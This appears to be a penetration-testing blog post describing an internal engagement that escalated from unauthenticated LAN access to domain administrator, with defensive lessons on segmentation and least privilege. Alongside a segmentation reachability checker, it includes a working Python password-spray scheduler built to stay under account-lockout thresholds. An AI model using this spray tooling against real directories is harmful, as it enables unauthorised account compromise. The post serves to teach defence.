Pentest story: Why internal segmentation still matters

  • Blog
  • 10 minute read
  • September 09, 2025

Even without external attacks, weak internal boundaries can lead to full domain compromise. Discover how a simple misconfiguration and excessive privileges enabled an attacker to escalate from zero access to domain dominance—and why internal segmentation is critical to cybersecurity resilience.


by George Giagkoudakis

In cybersecurity, much of the focus is placed on defending the perimeter: patching internet-facing systems, blocking phishing emails, enforcing MFA, and so on. But what happens when someone is already inside the network?

This is why internal segmentation and least-privilege access are just as critical as external defenses. A breach doesn't always begin with a sophisticated exploit; sometimes all it takes is a misconfigured system, an exposed protocol, or an account with a weak password.

In this post, we walk through a real-world internal penetration test that illustrates how quickly an attacker can escalate from zero access to full domain compromise when internal boundaries are weak or completely missing.

The Story

On one of our recent penetration testing projects, we were engaged to conduct an internal penetration test simulating an attacker who had already gained access to the corporate network. No domain credentials or internal information were provided. We were simply connected to the internal LAN and assigned an IP address, representing a third-party contractor or a rogue device plugged into the environment.

The First Discovery: Broad Internal Visibility

Our initial activity was basic network enumeration. Even without authentication, we were able to identify a large number of systems across the internal environment: file servers, domain controllers, application servers and user endpoints all responded to discovery probes.

This level of visibility from an unauthenticated host was the result of a flat internal network architecture, a common design that simplifies IT operations but leaves the environment exposed to lateral movement. In a more segmented setup, an unknown host would not be able to communicate with critical assets outside its assigned subnet, and a quick reachability check from such a host is the simplest way to verify that the intended boundaries actually exist.
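One way to turn that observation into a repeatable check, as an added example that is not part of the engagement's tooling: the script below is run from a host that is supposed to be untrusted (a contractor VLAN, a spare switch port) and compares what it can actually reach with what the segmentation policy permits. The inventory, addresses, ports and allow-list are constructed placeholders, and `tcp_open`, `check_segmentation` and the other names are this example's own.

```python
"""Segmentation reachability check (added example; not the tooling used on the engagement).

Run it from a host that should be untrusted and compare the services it can reach with
the services the segmentation policy says it may reach.
"""
import socket
from concurrent.futures import ThreadPoolExecutor

# Constructed sample inventory: names, addresses and ports are placeholders, not real systems.
CRITICAL_SERVICES = [
    ("dc01", "10.0.10.5", 88),      # Kerberos on a domain controller
    ("dc01", "10.0.10.5", 389),     # LDAP
    ("dc01", "10.0.10.5", 445),     # SMB (SAMR and LSA remote calls ride over this)
    ("fs01", "10.0.20.10", 445),    # file server SMB
    ("app01", "10.0.30.7", 5985),   # WinRM on an application server
    ("app01", "10.0.30.7", 443),    # the web front end contractors are meant to use
]
# Assumed policy: a contractor-VLAN host may reach only the application's HTTPS port.
CONTRACTOR_ALLOWED = {("app01", 443)}


def tcp_open(host, port, timeout=1.0):
    """True if a TCP handshake to host:port completes within the timeout.

    Refused and silently dropped (filtered) connections both count as unreachable,
    which is what matters for a segmentation check.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_segmentation(services, allowed, probe=tcp_open, workers=16):
    """Probe every (name, host, port) and classify it against the allow-list.

    Returns a list of (name, host, port, reason) findings; an empty list means the
    segmentation holds from the vantage point the check was run from.
    """
    with ThreadPoolExecutor(max_workers=workers) as pool:
        reachable = list(pool.map(lambda svc: probe(svc[1], svc[2]), services))
    findings = []
    for (name, host, port), is_open in zip(services, reachable):
        permitted = (name, port) in allowed
        if is_open and not permitted:
            findings.append((name, host, port, "reachable but not permitted"))
        elif permitted and not is_open:
            findings.append((name, host, port, "permitted but unreachable"))
    return findings


def flat_network(host, port):
    """Stand-in probe modelling the engagement's flat LAN: every service answers."""
    return True


if __name__ == "__main__":
    # With the real probe this takes the network's answer; the stand-in shows what a
    # flat network produces: every critical service except the allowed one is a finding.
    for finding in check_segmentation(CRITICAL_SERVICES, CONTRACTOR_ALLOWED, probe=flat_network):
        print("%-6s %-12s %5d  %s" % finding)
```

The "permitted but unreachable" branch is deliberate: a check that only reports unexpected openings will happily pass on a host whose cable is unplugged, so the allowed path is verified as well. Running the same script from each network zone (user VLAN, server VLAN, management) gives a matrix that can be diffed after every firewall change.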

Enumerating Domain Accounts and Breaking In

Initially, we used the SAMR (Security Account Manager Remote) protocol to enumerate domain account information without needing credentials, which only works when a domain controller still permits anonymous SAM enumeration. This revealed a list of valid domain usernames, many of which followed predictable naming conventions.

With this list in hand, we launched a password spray with a small number of attempts per account, spaced out to stay under the domain's lockout threshold. The spray succeeded and yielded the password of a valid domain user account. This was the first major step forward. Although this account was intended to have low privileges, further investigation revealed a broader issue.
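The "small number of attempts" is dictated by the domain's lockout policy (lockout threshold and observation window, visible with `net accounts /domain`). The scheduler below is an added example, not the tooling used on the engagement: it mirrors how a domain controller counts bad passwords and releases a guess only while the account stays a safety margin under the threshold. The policy values, usernames and passwords are constructed, and the login function is a stand-in to be replaced with a real SMB, LDAP or Kerberos authentication attempt.

```python
"""Lockout-aware password spray scheduler (added example; not the engagement's tooling).

Windows increments badPwdCount on every failed logon and resets it only once the lockout
observation window has passed since the LAST failure (badPasswordTime). A guess is
therefore safe only while the account's running count stays under the lockout
threshold; the count does not decay one guess at a time.
"""
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class LockoutPolicy:
    threshold: int             # lockout threshold; 0 means accounts never lock out
    observation_window: float  # lockout observation window, in seconds
    safety_margin: int = 2     # keep this many guesses in reserve under the threshold

    def guesses_per_window(self):
        """Guesses allowed per account inside one observation window (None = unlimited)."""
        if self.threshold == 0:
            return None
        return max(1, self.threshold - self.safety_margin)


class SprayScheduler:
    """Mirrors badPwdCount/badPasswordTime per account and says when a guess is safe."""

    def __init__(self, policy, clock=time.monotonic):
        self.policy = policy
        self.clock = clock
        self.state = {}  # user -> (bad_count, last_failure_time)

    def _counter(self, user):
        count, last = self.state.get(user, (0, None))
        now = self.clock()
        if last is not None and now - last >= self.policy.observation_window:
            count, last = 0, None  # window elapsed since the last failure: DC resets the count
        return count, last, now

    def delay_until_safe(self, user):
        """Seconds to wait before another guess against `user` stays under the limit."""
        limit = self.policy.guesses_per_window()
        count, last, now = self._counter(user)
        if limit is None or count < limit:
            return 0.0
        return self.policy.observation_window - (now - last)

    def record_failure(self, user):
        count, _, now = self._counter(user)
        self.state[user] = (count + 1, now)

    def record_success(self, user):
        self.state.pop(user, None)  # a successful logon clears badPwdCount


def spray(policy, users, passwords, try_login, clock=time.monotonic, sleep=time.sleep):
    """One password per round across all users, waiting out the window when needed.

    `try_login(user, password)` returns True on success; in real use this is an SMB,
    LDAP or Kerberos authentication attempt (assumed here, not implemented).
    """
    sched = SprayScheduler(policy, clock)
    found = {}
    for password in passwords:
        for user in users:
            if user in found:
                continue
            delay = sched.delay_until_safe(user)
            if delay > 0:
                sleep(delay)
            if try_login(user, password):
                found[user] = password
                sched.record_success(user)
            else:
                sched.record_failure(user)
    return found


class FakeClock:
    """Virtual clock so the demo runs offline without really sleeping."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def sleep(self, seconds):
        self.now += seconds


# Constructed demo data: the policy, usernames and passwords are made up for illustration.
DEMO_POLICY = LockoutPolicy(threshold=5, observation_window=30 * 60)
DEMO_USERS = ["j.smith", "a.jones", "m.brown"]
DEMO_PASSWORDS = ["Welcome1", "Summer2025!", "Password1", "Company2025!"]


def run_demo(accounts):
    """Spray the demo lists against a fake directory; returns (hits, virtual seconds used)."""
    clock = FakeClock()
    hits = spray(DEMO_POLICY, DEMO_USERS, DEMO_PASSWORDS,
                 lambda user, pw: accounts.get(user) == pw, clock=clock, sleep=clock.sleep)
    return hits, clock.now


if __name__ == "__main__":
    print(run_demo({"a.jones": "Company2025!"}))  # ({'a.jones': 'Company2025!'}, 1800.0)
```

With a threshold of 5 and a margin of 2, the demo spends three passwords, waits out the full 30-minute window, and only then tries the fourth. Two caveats worth keeping in mind: the scheduler starts every account at zero, but a real account may already carry failed logons from its owner, which is what the safety margin is for; and badPwdCount is per domain controller yet failures are forwarded to the PDC emulator, so spraying against several DCs does not buy extra guesses. Accounts covered by a fine-grained password policy can also have a stricter threshold than the domain default.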


Domain User, Local Admin… and Much More

We checked the access rights of the compromised domain account and found that this user was a local administrator on multiple systems across the environment. With local administrator privileges on several machines, we extracted Local Security Authority (LSA) secrets from one of them, uncovering stored credentials used by Windows services. Among these secrets was the cleartext password of a domain administrator account. This privileged account was configured as the service account for an enterprise software agent responsible for deploying software updates across the network. Because LSA secrets are only protected against non-administrators, any local administrator on a host can recover the passwords of the services running there; a service that runs as a domain administrator therefore hands domain admin to every local administrator of every machine it is installed on.

With those credentials, we had full domain administrator access, but we did not stop there. To demonstrate the potential impact of the attack chain, we accessed a sample of sensitive data.


Closing Thoughts

This assessment is a textbook example of how internal oversights can lead to critical compromise even when no external attack is involved. A flat network, weak credential hygiene, and excessive privileges created a chain of opportunities that allowed us to go from unauthenticated network access to domain dominance in a short timeframe.

Key lessons from this engagement:

  • Segment internal networks to limit lateral movement and reduce exposure between critical systems.

  • Restrict local administrator privileges to those who truly need them, and avoid granting one domain account local admin on many machines.

  • Store privileged credentials securely to prevent unintended access or extraction, and never run an agent that is installed on every endpoint under a domain administrator account; use a dedicated, least-privilege service account instead.

  • Implement Privileged Access Management (PAM) to control, monitor, and audit the use of high-privilege accounts.

  • Adopt a defense-in-depth strategy to ensure multiple layers of security protect your core infrastructure.

A strong perimeter is important, but it's only part of the story. True resilience comes from layered defenses that account for what happens after the perimeter is breached.

In this case, there were no zero-days, no exotic attack chains, and no phishing involved. Just network access, a common password, and excessive privileges. Internal segmentation, least privilege, and secure service account practices aren't just nice to have; they are what stops a small breach from becoming a full domain compromise.
